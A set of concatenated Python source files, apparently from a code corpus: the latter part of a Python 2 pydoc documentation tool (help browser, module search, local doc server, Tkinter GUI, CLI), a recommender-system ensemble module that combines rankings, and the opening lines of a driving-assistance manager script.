            elif request in self.keywords: self.showtopic(request)
            elif request in self.topics: self.showtopic(request)
            elif request: doc(request, 'Help on %s:')
        elif isinstance(request, Helper): self()
        else: doc(request, 'Help on %s:')
        self.output.write('\n')

    def intro(self):
        self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])

    def list(self, items, columns=4, width=80):
        """Write items in a sorted, column-major table.

        Uses Python 2 integer division for the column width and row count.
        """
        items = items[:]
        items.sort()
        colw = width / columns
        rows = (len(items) + columns - 1) / columns
        for row in range(rows):
            for col in range(columns):
                i = col * rows + row
                if i < len(items):
                    self.output.write(items[i])
                    if col < columns - 1:
                        self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
            self.output.write('\n')

    def listkeywords(self):
        self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
        self.list(self.keywords.keys())

    def listsymbols(self):
        self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
        self.list(self.symbols.keys())

    def listtopics(self):
        self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
        self.list(self.topics.keys())

    def showtopic(self, topic, more_xrefs=''):
        """Page the documentation for a topic or keyword, plus cross-refs."""
        try:
            import pydoc_topics
        except ImportError:
            self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_topics" could not be found.
''')
            return
        target = self.topics.get(topic, self.keywords.get(topic))
        if not target:
            self.output.write('no documentation found for %s\n' % repr(topic))
            return
        # A plain-string entry is an alias for another topic.
        if type(target) is type(''):
            return self.showtopic(target, more_xrefs)
        label, xrefs = target
        try:
            doc = pydoc_topics.topics[label]
        except KeyError:
            self.output.write('no documentation found for %s\n' % repr(topic))
            return
        pager(strip(doc) + '\n')
        if more_xrefs:
            xrefs = (xrefs or '') + ' ' + more_xrefs
        if xrefs:
            # Wrap the "Related help topics" line to the terminal width.
            import StringIO, formatter
            buffer = StringIO.StringIO()
            formatter.DumbWriter(buffer).send_flowing_data(
                'Related help topics: ' + join(split(xrefs), ', ') + '\n')
            self.output.write('\n%s\n' % buffer.getvalue())

    def showsymbol(self, symbol):
        # First word of the table entry is the topic; the rest are xrefs.
        target = self.symbols[symbol]
        topic, _, xrefs = target.partition(' ')
        self.showtopic(topic, xrefs)

    def listmodules(self, key=''):
        if key:
            self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
            apropos(key)
        else:
            self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
            modules = {}
            def callback(path, modname, desc, modules=modules):
                if modname and modname[-9:] == '.__init__':
                    modname = modname[:-9] + ' (package)'
                if find(modname, '.') < 0:
                    modules[modname] = 1
            def onerror(modname):
                callback(None, modname, None)
            ModuleScanner().run(callback, onerror=onerror)
            self.list(modules.keys())
            self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper(sys.stdin, sys.stdout)
class Scanner:
    """A generic tree iterator.

    Repeated next() calls walk the trees rooted at *roots* depth-first,
    returning child nodes one at a time (the roots themselves are never
    returned) and descending into a child only when descendp(child) is
    true.  Returns None once the traversal is exhausted.
    """
    def __init__(self, roots, children, descendp):
        self.roots = roots[:]        # private work copy; consumed front-first
        self.state = []              # stack of (node, pending-children) pairs
        self.children = children     # node -> list of its children
        self.descendp = descendp     # node -> whether to recurse into it
    def next(self):
        # Iteratively discard exhausted frames (the original recursed here),
        # refilling the stack from the next root when it empties.
        while True:
            if not self.state:
                if not self.roots:
                    return None
                top = self.roots.pop(0)
                self.state = [(top, self.children(top))]
            node, pending = self.state[-1]
            if pending:
                break
            self.state.pop()
        child = pending.pop(0)
        if self.descendp(child):
            self.state.append((child, self.children(child)))
        return child
class ModuleScanner:
    """An interruptible scanner that searches module synopses."""
    def run(self, callback, key=None, completer=None, onerror=None):
        """Scan built-in then importable modules, invoking callback(path,
        modname, desc) for each; key=None reports everything, otherwise only
        modules whose "name - description" contains the lowercased key.
        Setting self.quit (e.g. from another thread) stops the scan.
        """
        if key: key = lower(key)
        self.quit = False
        seen = {}
        # NOTE(review): 'seen' records builtin module names but is never
        # consulted afterwards in this method.
        for modname in sys.builtin_module_names:
            if modname != '__main__':
                seen[modname] = 1
                if key is None:
                    callback(None, modname, '')
                else:
                    desc = split(__import__(modname).__doc__ or '', '\n')[0]
                    if find(lower(modname + ' - ' + desc), key) >= 0:
                        callback(None, modname, desc)
        for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
            if self.quit:
                break
            if key is None:
                callback(None, modname, '')
            else:
                # Prefer reading the synopsis from source without importing;
                # fall back to a real import when no source is available.
                loader = importer.find_module(modname)
                if hasattr(loader,'get_source'):
                    import StringIO
                    desc = source_synopsis(
                        StringIO.StringIO(loader.get_source(modname))
                    ) or ''
                    if hasattr(loader,'get_filename'):
                        path = loader.get_filename(modname)
                    else:
                        path = None
                else:
                    module = loader.load_module(modname)
                    desc = (module.__doc__ or '').splitlines()[0]
                    path = getattr(module,'__file__',None)
                if find(lower(modname + ' - ' + desc), key) >= 0:
                    callback(path, modname, desc)
        if completer:
            completer()
def apropos(key):
    """Print all the one-line module summaries that contain a substring."""
    def callback(path, modname, desc):
        if modname[-9:] == '.__init__':
            modname = modname[:-9] + ' (package)'
        print modname, desc and '- ' + desc
    # Scanning may import arbitrary modules; silence their warnings.
    try: import warnings
    except ImportError: pass
    else: warnings.filterwarnings('ignore') # ignore problems during import
    ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
    """Serve HTML documentation over HTTP on localhost until told to quit.

    callback(server) is invoked once the server is ready; completer() is
    invoked after the serve loop ends (including on KeyboardInterrupt).
    """
    import BaseHTTPServer, mimetools, select
    # Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
    class Message(mimetools.Message):
        def __init__(self, fp, seekable=1):
            Message = self.__class__
            Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
            self.encodingheader = self.getheader('content-transfer-encoding')
            self.typeheader = self.getheader('content-type')
            self.parsetype()
            self.parseplist()
    class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        def send_document(self, title, contents):
            try:
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                self.wfile.write(html.page(title, contents))
            except IOError: pass
        def do_GET(self):
            # URL scheme: "/<dotted.name>.html" documents that object;
            # "/" (or ".") produces an index of all modules.
            path = self.path
            if path[-5:] == '.html': path = path[:-5]
            if path[:1] == '/': path = path[1:]
            if path and path != '.':
                try:
                    obj = locate(path, forceload=1)
                except ErrorDuringImport, value:
                    self.send_document(path, html.escape(str(value)))
                    return
                if obj:
                    self.send_document(describe(obj), html.document(obj, path))
                else:
                    self.send_document(path,
'no Python documentation found for %s' % repr(path))
            else:
                heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
                def bltinlink(name):
                    return '<a href="%s.html">%s</a>' % (name, name)
                names = filter(lambda x: x != '__main__',
                               sys.builtin_module_names)
                contents = html.multicolumn(names, bltinlink)
                indices = ['<p>' + html.bigsection(
                    'Built-in Modules', '#ffffff', '#ee77aa', contents)]
                seen = {}
                for dir in sys.path:
                    indices.append(html.index(dir, seen))
                contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
                self.send_document('Index of Modules', contents)
        def log_message(self, *args): pass  # silence per-request logging
    class DocServer(BaseHTTPServer.HTTPServer):
        def __init__(self, port, callback):
            host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
            self.address = ('', port)
            self.url = 'http://%s:%d/' % (host, port)
            self.callback = callback
            self.base.__init__(self, self.address, self.handler)
        def serve_until_quit(self):
            # Poll with a 1s select timeout so self.quit is honoured promptly.
            import select
            self.quit = False
            while not self.quit:
                rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
                if rd: self.handle_request()
        def server_activate(self):
            self.base.server_activate(self)
            if self.callback: self.callback(self)
    DocServer.base = BaseHTTPServer.HTTPServer
    DocServer.handler = DocHandler
    DocHandler.MessageClass = Message
    try:
        try:
            DocServer(port, callback).serve_until_quit()
        except (KeyboardInterrupt, select.error):
            pass
    finally:
        if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
    """Graphical interface (starts web server and pops up a control window)."""
    class GUI:
        # Tkinter control window: a server-status row, a search row, and a
        # collapsible module-search result list.  The doc server and module
        # scanner each run on background threads.
        def __init__(self, window, port=7464):
            self.window = window
            self.server = None
            self.scanner = None
            import Tkinter
            self.server_frm = Tkinter.Frame(window)
            self.title_lbl = Tkinter.Label(self.server_frm,
                text='Starting server...\n ')
            self.open_btn = Tkinter.Button(self.server_frm,
                text='open browser', command=self.open, state='disabled')
            self.quit_btn = Tkinter.Button(self.server_frm,
                text='quit serving', command=self.quit, state='disabled')
            self.search_frm = Tkinter.Frame(window)
            self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
            self.search_ent = Tkinter.Entry(self.search_frm)
            self.search_ent.bind('<Return>', self.search)
            self.stop_btn = Tkinter.Button(self.search_frm,
                text='stop', pady=0, command=self.stop, state='disabled')
            if sys.platform == 'win32':
                # Trying to hide and show this button crashes under Windows.
                self.stop_btn.pack(side='right')
            self.window.title('pydoc')
            self.window.protocol('WM_DELETE_WINDOW', self.quit)
            self.title_lbl.pack(side='top', fill='x')
            self.open_btn.pack(side='left', fill='x', expand=1)
            self.quit_btn.pack(side='right', fill='x', expand=1)
            self.server_frm.pack(side='top', fill='x')
            self.search_lbl.pack(side='left')
            self.search_ent.pack(side='right', fill='x', expand=1)
            self.search_frm.pack(side='top', fill='x')
            self.search_ent.focus_set()
            font = ('helvetica', sys.platform == 'win32' and 8 or 10)
            self.result_lst = Tkinter.Listbox(window, font=font, height=6)
            self.result_lst.bind('<Button-1>', self.select)
            self.result_lst.bind('<Double-Button-1>', self.goto)
            self.result_scr = Tkinter.Scrollbar(window,
                orient='vertical', command=self.result_lst.yview)
            self.result_lst.config(yscrollcommand=self.result_scr.set)
            self.result_frm = Tkinter.Frame(window)
            self.goto_btn = Tkinter.Button(self.result_frm,
                text='go to selected', command=self.goto)
            self.hide_btn = Tkinter.Button(self.result_frm,
                text='hide results', command=self.hide)
            self.goto_btn.pack(side='left', fill='x', expand=1)
            self.hide_btn.pack(side='right', fill='x', expand=1)
            self.window.update()
            # Remember collapsed ("min") and expanded ("big") geometries.
            self.minwidth = self.window.winfo_width()
            self.minheight = self.window.winfo_height()
            self.bigminheight = (self.server_frm.winfo_reqheight() +
                                 self.search_frm.winfo_reqheight() +
                                 self.result_lst.winfo_reqheight() +
                                 self.result_frm.winfo_reqheight())
            self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
            self.expanded = 0
            self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
            self.window.wm_minsize(self.minwidth, self.minheight)
            self.window.tk.willdispatch()
            import threading
            # Run the doc server on a thread so the GUI stays responsive.
            threading.Thread(
                target=serve, args=(port, self.ready, self.quit)).start()
        def ready(self, server):
            # Called (from the server thread) once serving has started.
            self.server = server
            self.title_lbl.config(
                text='Python documentation server at\n' + server.url)
            self.open_btn.config(state='normal')
            self.quit_btn.config(state='normal')
        def open(self, event=None, url=None):
            url = url or self.server.url
            try:
                import webbrowser
                webbrowser.open(url)
            except ImportError: # pre-webbrowser.py compatibility
                if sys.platform == 'win32':
                    os.system('start "%s"' % url)
                elif sys.platform == 'mac':
                    try: import ic
                    except ImportError: pass
                    else: ic.launchurl(url)
                else:
                    rc = os.system('netscape -remote "openURL(%s)" &' % url)
                    if rc: os.system('netscape "%s" &' % url)
        def quit(self, event=None):
            if self.server:
                self.server.quit = 1
            self.window.quit()
        def search(self, event=None):
            # Kick off (or restart) a background module scan for the key.
            key = self.search_ent.get()
            self.stop_btn.pack(side='right')
            self.stop_btn.config(state='normal')
            self.search_lbl.config(text='Searching for "%s"...' % key)
            self.search_ent.forget()
            self.search_lbl.pack(side='left')
            self.result_lst.delete(0, 'end')
            self.goto_btn.config(state='disabled')
            self.expand()
            import threading
            if self.scanner:
                self.scanner.quit = 1
            self.scanner = ModuleScanner()
            threading.Thread(target=self.scanner.run,
                             args=(self.update, key, self.done)).start()
        def update(self, path, modname, desc):
            # Scanner callback: append one result line to the listbox.
            if modname[-9:] == '.__init__':
                modname = modname[:-9] + ' (package)'
            self.result_lst.insert('end',
                modname + ' - ' + (desc or '(no description)'))
        def stop(self, event=None):
            if self.scanner:
                self.scanner.quit = 1
                self.scanner = None
        def done(self):
            # Scanner callback: restore the search row when the scan ends.
            self.scanner = None
            self.search_lbl.config(text='Search for')
            self.search_lbl.pack(side='left')
            self.search_ent.pack(side='right', fill='x', expand=1)
            if sys.platform != 'win32': self.stop_btn.forget()
            self.stop_btn.config(state='disabled')
        def select(self, event=None):
            self.goto_btn.config(state='normal')
        def goto(self, event=None):
            # Open the doc page for the currently selected search result.
            selection = self.result_lst.curselection()
            if selection:
                modname = split(self.result_lst.get(selection[0]))[0]
                self.open(url=self.server.url + modname + '.html')
        def collapse(self):
            if not self.expanded: return
            self.result_frm.forget()
            self.result_scr.forget()
            self.result_lst.forget()
            self.bigwidth = self.window.winfo_width()
            self.bigheight = self.window.winfo_height()
            self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
            self.window.wm_minsize(self.minwidth, self.minheight)
            self.expanded = 0
        def expand(self):
            if self.expanded: return
            self.result_frm.pack(side='bottom', fill='x')
            self.result_scr.pack(side='right', fill='y')
            self.result_lst.pack(side='top', fill='both', expand=1)
            self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
            self.window.wm_minsize(self.minwidth, self.bigminheight)
            self.expanded = 1
        def hide(self, event=None):
            self.stop()
            self.collapse()
    import Tkinter
    try:
        root = Tkinter.Tk()
        # Tk will crash if pythonw.exe has an XP .manifest
        # file and the root has is not destroyed explicitly.
        # If the problem is ever fixed in Tk, the explicit
        # destroy can go.
        try:
            gui = GUI(root)
            root.mainloop()
        finally:
            root.destroy()
    except KeyboardInterrupt:
        pass
# -------------------------------------------------- command-line interface
def ispath(x):
    """Return whether x is a string containing a path separator.

    Uses the 'in' operator instead of the long-deprecated Python 2
    string-module find() function; non-string arguments yield False.
    """
    return isinstance(x, str) and os.sep in x
def cli():
    """Command-line interface (looks at sys.argv to decide what to do)."""
    import getopt
    class BadUsage: pass  # raised internally to trigger the usage message
    # Scripts don't get the current directory in their path by default
    # unless they are run with the '-m' switch
    if '' not in sys.path:
        scriptdir = os.path.dirname(sys.argv[0])
        if scriptdir in sys.path:
            sys.path.remove(scriptdir)
        sys.path.insert(0, '.')
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
        writing = 0
        for opt, val in opts:
            if opt == '-g':
                # Launch the Tkinter GUI and return immediately.
                gui()
                return
            if opt == '-k':
                # Keyword search over module synopses.
                apropos(val)
                return
            if opt == '-p':
                # Serve HTML documentation over HTTP on the given port.
                try:
                    port = int(val)
                except ValueError:
                    raise BadUsage
                def ready(server):
                    print 'pydoc server ready at %s' % server.url
                def stopped():
                    print 'pydoc server stopped'
                serve(port, ready, stopped)
                return
            if opt == '-w':
                # Write HTML files instead of paging text documentation.
                writing = 1
        if not args: raise BadUsage
        for arg in args:
            # Arguments that look like filesystem paths must exist.
            if ispath(arg) and not os.path.exists(arg):
                print 'file %r does not exist' % arg
                break
            try:
                if ispath(arg) and os.path.isfile(arg):
                    arg = importfile(arg)
                if writing:
                    if ispath(arg) and os.path.isdir(arg):
                        writedocs(arg)
                    else:
                        writedoc(arg)
                else:
                    help.help(arg)
            except ErrorDuringImport, value:
                print value
    except (getopt.error, BadUsage):
        cmd = os.path.basename(sys.argv[0])
        print """pydoc - the Python documentation tool
%s <name> ...
    Show text documentation on something. <name> may be the name of a
    Python keyword, topic, function, module, or package, or a dotted
    reference to a class or function within a module or module in a
    package. If <name> contains a '%s', it is used as the path to a
    Python source file to document. If name is 'keywords', 'topics',
    or 'modules', a listing of these things is displayed.
%s -k <keyword>
    Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
    Start an HTTP server on the given port on the local machine.
%s -g
    Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
    Write out the HTML documentation for a module to a file in the current
    directory. If <name> contains a '%s', it is treated as a filename; if
    it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
ensembles_base.py | import warnings
from abc import abstractmethod, ABC
from functools import partial
from itertools import repeat
from multiprocessing import Process, Queue
from multiprocessing.pool import ThreadPool, Pool
from queue import PriorityQueue
from threading import Thread
import numpy as np
import pandas as pd
import scipy.stats
from ml_recsys_tools.recommenders.recommender_base import BaseDFSparseRecommender
from ml_recsys_tools.utils.parallelism import N_CPUS
RANK_COMBINATION_FUNCS = {
'mean': np.mean,
'max': np.max,
'min': np.min,
'gmean': scipy.stats.gmean,
'hmean': scipy.stats.hmean
}
def calc_dfs_and_combine_scores(calc_funcs, groupby_col, item_col, scores_col,
                                fill_val, combine_func='hmean', n_threads=1,
                                parallelism='process'):
    """
    combine multiple dataframes by voting on prediction rank

    :param calc_funcs: functions that return the dataframes to be combined
    :param groupby_col: the column of the entities for which the ranking is calculated (e.g. users)
    :param item_col: the column of the entities to be ranked (items)
    :param scores_col: the column of the scores to be ranked (predictions)
    :param fill_val: rank to be assigned to NaN prediction values
        (items appearing in some dataframes but not in others)
    :param combine_func: defaults 'hmean', the function that is used to combine the predictions
        (can be a callable like np.mean or a string that is assumed to be
        a key in the RANK_COMBINATION_FUNCS mapping)
    :param n_threads: number of calculation workers
    :param parallelism: type of parallelism ('process' or 'thread')
    :return: a combined dataframe of the same format as the dataframes created by the calc_funcs
    """
    # set up
    multiproc = 'process' in parallelism
    _END = 'END'  # sentinel telling workers / joiner to stop
    q_in = Queue()
    # q_out holds (len + jitter, dataframe) pairs; with threads a
    # PriorityQueue is used so the smallest frames get joined first.
    q_out = Queue() if multiproc else PriorityQueue()
    rank_cols = ['rank_' + str(i) for i in range(len(calc_funcs))]
    n_jobs = len(calc_funcs)
    n_workers = min(n_threads, n_jobs)
    if not callable(combine_func):
        combine_func = RANK_COMBINATION_FUNCS[combine_func]
    # random tie-breaker so the PriorityQueue never has to compare two
    # DataFrames directly (which would raise)
    jitter = lambda: np.random.rand()

    def _calc_df_and_add_rank_score(i):
        # run the i-th calc function and convert its scores to per-group ranks
        df = calc_funcs[i]()
        df = df.drop_duplicates()
        # another pandas bug workaround
        df[groupby_col] = df[groupby_col].astype(str, copy=False)
        df[item_col] = df[item_col].astype(str, copy=False)
        df[scores_col] = df[scores_col].astype(float, copy=False)
        df = df.reset_index(drop=True)  # resetting index due to pandas bug
        # rank within each group, best score = rank 1
        df[rank_cols[i]] = df. \
            groupby(groupby_col)[scores_col].\
            rank(ascending=False)
        df = df.drop(scores_col, axis=1).set_index([groupby_col, item_col])
        q_out.put((len(df) + jitter(), df))

    def _joiner():
        # opportunistically outer-joins pairs of result frames while
        # workers are still producing, to overlap compute and joining
        while True:
            _, df1 = q_out.get()
            if isinstance(df1, str) and df1 == _END:
                break
            _, df2 = q_out.get()
            if isinstance(df2, str) and df2 == _END:
                q_out.put((len(df1) + jitter(), df1))  # put it back
                break
            df_joined = df2.join(df1, how='outer')
            q_out.put((len(df_joined) + jitter(), df_joined))

    def _worker():
        # consume job indices until the END sentinel is seen
        i = q_in.get()
        while i != _END:
            _calc_df_and_add_rank_score(i)
            i = q_in.get()

    if multiproc:
        workers = [Process(target=_worker) for _ in range(n_workers)]
    else:
        workers = [Thread(target=_worker) for _ in range(n_workers)]
    joiner = Thread(target=_joiner)

    # submit and start jobs (one END token per worker)
    [q_in.put(i) for i in range(n_jobs)] + [q_in.put(_END) for _ in range(n_workers)]
    [j.start() for j in workers + [joiner]]
    [j.join() for j in workers]
    # stop joiner after workers are done by putting END token
    q_out.put((0, _END))
    joiner.join()

    # final reduce (faster to join in couples rather one by one)
    # NOTE(review): multiprocessing.Queue.qsize() is approximate and raises
    # NotImplementedError on macOS -- presumably this only runs on Linux;
    # confirm.
    while q_out.qsize() > 1:
        _, df1 = q_out.get()
        _, df2 = q_out.get()
        df_joined = df2.join(df1, how='outer')
        q_out.put((len(df_joined), df_joined))

    # get final result
    _, merged_df = q_out.get()
    merged_df.fillna(fill_val, inplace=True)
    # combine ranks: reciprocal rank so larger = better before combining
    merged_df[scores_col] = combine_func(1 / merged_df[rank_cols].values, axis=1)
    # drop temp cols
    merged_df.drop(rank_cols, axis=1, inplace=True)
    return merged_df.reset_index()
class EnsembleBase(BaseDFSparseRecommender):
    """Base class for ensembles that combine the outputs of several
    sub-recommenders by rank voting (see calc_dfs_and_combine_scores).
    """

    def __init__(self,
                 combination_mode='hmean',
                 na_rank_fill=None,
                 **kwargs):
        """
        :param combination_mode: key into RANK_COMBINATION_FUNCS (or a
            callable) used to combine the sub-recommenders' reciprocal ranks.
        :param na_rank_fill: rank assigned to items missing from a
            sub-recommender's output; None means a per-call default
            (n_rec + 1 / n_unfilt + 1) is used.
        """
        self.combination_mode = combination_mode
        self.na_rank_fill = na_rank_fill
        self.recommenders = []
        super().__init__(**kwargs)

    def set_exclude_mat(self, exclude_obs=None, exclude_training=True):
        """Set the exclusion matrix on self and propagate to all members."""
        super().set_exclude_mat(exclude_obs=exclude_obs, exclude_training=exclude_training)
        # plain loop instead of a list comprehension used for side effects
        for rec in self.recommenders:
            rec.set_exclude_mat(exclude_obs=exclude_obs, exclude_training=exclude_training)

    def n_concurrent(self):
        # number of parallel workers used when combining member outputs
        return N_CPUS

    def set_params(self, **params):
        """Set parameters; ensemble-level params are popped onto self first."""
        params = self._pop_set_params(params, ['combination_mode', 'na_rank_fill'])
        # set on self
        super().set_params(**params.copy())

    def _get_recommendations_flat(self, user_ids, item_ids, n_rec=100, **kwargs):
        """Combine flat recommendation dataframes from all members."""
        calc_funcs = [
            partial(
                rec.get_recommendations,
                user_ids=user_ids, item_ids=item_ids,
                n_rec=n_rec, results_format='flat', **kwargs)
            for rec in self.recommenders]

        recos_flat = calc_dfs_and_combine_scores(
            calc_funcs=calc_funcs,
            combine_func=self.combination_mode,
            # "is not None" so an explicit na_rank_fill of 0 is honoured
            fill_val=self.na_rank_fill if self.na_rank_fill is not None else (n_rec + 1),
            groupby_col=self._user_col,
            item_col=self._item_col,
            scores_col=self._prediction_col,
            n_threads=self.n_concurrent()
        )
        return recos_flat

    def get_similar_items(self, item_ids=None, target_item_ids=None, n_simil=10,
                          n_unfilt=100, results_format='lists', **kwargs):
        """Combine similar-item results from all members.

        Each member contributes its top n_unfilt similarities; the combined
        ranking is then cut to n_simil per item (for 'lists' format).
        """
        calc_funcs = [partial(rec.get_similar_items,
                              item_ids=item_ids, target_item_ids=target_item_ids,
                              n_simil=n_unfilt, results_format='flat', **kwargs)
                      for rec in self.recommenders]

        combined_simil_df = calc_dfs_and_combine_scores(
            calc_funcs=calc_funcs,
            combine_func=self.combination_mode,
            # "is not None" so an explicit na_rank_fill of 0 is honoured
            fill_val=self.na_rank_fill if self.na_rank_fill is not None else (n_unfilt + 1),
            groupby_col=self._item_col_simil,
            item_col=self._item_col,
            scores_col=self._prediction_col)

        return combined_simil_df if results_format == 'flat' \
            else self._simil_flat_to_lists(combined_simil_df, n_cutoff=n_simil)

    def _predict_on_inds_dense(self, user_inds, item_inds):
        # dense index-based prediction is not meaningful for a rank ensemble
        raise NotImplementedError()

    def predict_for_user(self, user_id, item_ids, rank_training_last=True,
                         sort=True, combine_original_order=False):
        """Combine single-user predictions from all members.

        Uses thread parallelism since the per-member work is small.
        """
        calc_funcs = [
            partial(
                rec.predict_for_user,
                user_id=user_id,
                item_ids=item_ids,
                rank_training_last=rank_training_last,
                combine_original_order=combine_original_order,
            )
            for rec in self.recommenders]

        df = calc_dfs_and_combine_scores(
            calc_funcs=calc_funcs,
            combine_func=self.combination_mode,
            fill_val=len(item_ids),
            groupby_col=self._user_col,
            item_col=self._item_col,
            scores_col=self._prediction_col,
            n_threads=N_CPUS,
            parallelism='thread'
        )
        if sort:
            df.sort_values(self._prediction_col, ascending=False, inplace=True)
        return df
class SubdivisionEnsembleBase(EnsembleBase):
    """Ensemble base that creates several sub-recommenders of one concrete
    type and fits each on a subdivision of the training data.
    """

    def __init__(self,
                 n_recommenders=1,
                 concurrence_ratio=0.3,
                 concurrency_backend='threads',
                 **kwargs):
        """
        :param n_recommenders: number of sub-recommenders to create.
        :param concurrence_ratio: fraction of sub-recommenders fitted
            concurrently (capped at N_CPUS).
        :param concurrency_backend: 'threads' or 'processes' for the fit pool.
        """
        self.n_recommenders = n_recommenders
        self.concurrence_ratio = concurrence_ratio
        self.concurrency_backend = concurrency_backend
        super().__init__(**kwargs)
        # NOTE(review): sub_class_type is None at this point, so the
        # _init_recommenders() call below would invoke None(...) unless a
        # subclass sets sub_class_type (e.g. as a class attribute) or
        # overrides _init_recommenders -- confirm against subclasses.
        self.sub_class_type = None
        self._init_recommenders()

    def get_workers_pool(self, concurrency_backend=None):
        """Return a thread or process pool sized by n_concurrent()."""
        if concurrency_backend is None:
            concurrency_backend = self.concurrency_backend
        if 'thread' in concurrency_backend:
            return ThreadPool(self.n_concurrent())
        elif 'proc' in concurrency_backend:
            # maxtasksperchild keeps worker memory bounded across fits
            return Pool(self.n_concurrent(), maxtasksperchild=3)

    def _init_recommenders(self, **params):
        # fresh instances of the concrete sub-recommender type
        self.recommenders = [self.sub_class_type(**params.copy())
                             for _ in range(self.n_recommenders)]

    def n_concurrent(self):
        # scale concurrency with the number of sub-recommenders, capped at N_CPUS
        return int(min(np.ceil(len(self.recommenders) * self.concurrence_ratio), N_CPUS))

    def set_params(self, **params):
        """Set parameters; subdivision-level params are popped onto self."""
        params = self._pop_set_params(
            params, ['n_recommenders', 'concurrence_ratio'])
        # set on self
        super().set_params(**params.copy())
        # init sub models to make sure they're the right object already
        self._init_recommenders(**self.model_params)
        # # set for each sub_model
        # for model in self.recommenders:
        #     # model.set_params(**params.copy())
        #     model.set_params()

    @abstractmethod
    def _generate_sub_model_train_data(self, train_obs):
        # must yield one training-data slice per sub-recommender
        pass

    @abstractmethod
    def _fit_sub_model(self, args):
        # args is a (index, train_data, fit_params) tuple; returns the fitted model
        pass

    def fit(self, train_obs, **fit_params):
        """Fit all sub-recommenders (possibly concurrently) on their slices."""
        self._set_data(train_obs)
        sub_model_train_data_generator = self._generate_sub_model_train_data(train_obs)

        n_recommenders = self.n_recommenders
        with self.get_workers_pool() as pool:
            self.recommenders = list(
                pool.imap(self._fit_sub_model,
                          zip(range(n_recommenders),
                              sub_model_train_data_generator,
                              repeat(fit_params, n_recommenders))))
        return self

    # def sub_model_evaluations(self, test_dfs, test_names, include_train=True):
    #     stats = []
    #     reports = []
    #     for m in self.recommenders:
    #         users = m.train_df[self.train_obs.uid_col].unique()
    #         items = m.train_df[self.train_obs.iid_col].unique()
    #         sub_test_dfs = [df[df[self.train_obs.uid_col].isin(users) &
    #                            df[self.train_obs.iid_col].isin(items)] for df in test_dfs]
    #         lfm_report = m.eval_on_test_by_ranking(
    #             include_train=include_train,
    #             test_dfs=sub_test_dfs,
    #             prefix='lfm sub model',
    #             test_names=test_names
    #         )
    #         stats.append('train: %d, test: %s' %
    #                      (len(m.train_df), [len(df) for df in sub_test_dfs]))
    #         reports.append(lfm_report)
    #     return stats, reports
class CombinationEnsembleBase(EnsembleBase):
    """Ensemble over already-fitted recommenders; only combines outputs."""

    def __init__(self, recommenders, **kwargs):
        """
        :param recommenders: list of already fitted recommenders to combine.
        """
        super().__init__(**kwargs)
        self.recommenders = recommenders
        # reuse the training data / id mappings of the first member
        self._reuse_data(self.recommenders[0])

    def fit(self, *args, **kwargs):
        # deliberately a no-op: members are expected to be pre-fitted
        warnings.warn('Fit is not supported, recommenders should already be fitted.')
|
manager.py | #!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
  """Fork a pty; the parent relays the child's output non-blockingly.

  The child (return path) continues as the caller with its stdout on a
  pty. The parent forwards SIGINT/SIGTERM to the child, copies the pty
  output to its own (non-blocking) stdout, and exits with the child's
  exit status.
  """
  # get a non-blocking stdout
  child_pid, child_pty = os.forkpty()
  if child_pid != 0:  # parent
    # child is in its own process group, manually pass kill signals
    signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
    signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))

